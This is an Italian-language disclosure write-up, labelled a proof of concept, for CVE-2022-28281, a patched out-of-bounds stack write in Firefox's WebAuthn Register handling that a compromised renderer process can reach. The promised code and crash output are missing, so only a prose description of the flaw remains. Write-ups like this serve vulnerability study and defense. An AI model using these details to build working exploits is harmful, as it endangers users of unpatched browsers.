
PoC per CVE-2022-28281, una scrittura fuori dai limiti in Mozilla Firefox.
Questo è un bug che può essere attivato da un processo renderer di Firefox su Windows compromesso. Se un processo di contenuto compromesso invia un numero imprevisto di estensioni WebAuthN in un comando Register al processo padre, si verifica una scrittura fuori dai limiti che porta a corruzione della memoria e a un crash potenzialmente sfruttabile.
È stato assegnato CVE-2022-28281, corretto in Firefox 99 e documentato in mfsa2022-13.
Il problema può essere visto nella funzione WinWebAuthnManager::Register; nelle righe seguenti:

Un processo renderer compromesso è in grado di fornire più di 1 estensione, il che fa sì che il codice sopra corrompa la memoria dello stack adiacente. Non credo sia possibile raggiungere questo stato con semplice Javascript.
Ecco come appare un crash quando si colpisce la pagina di protezione dello stack (inviando molte estensioni):
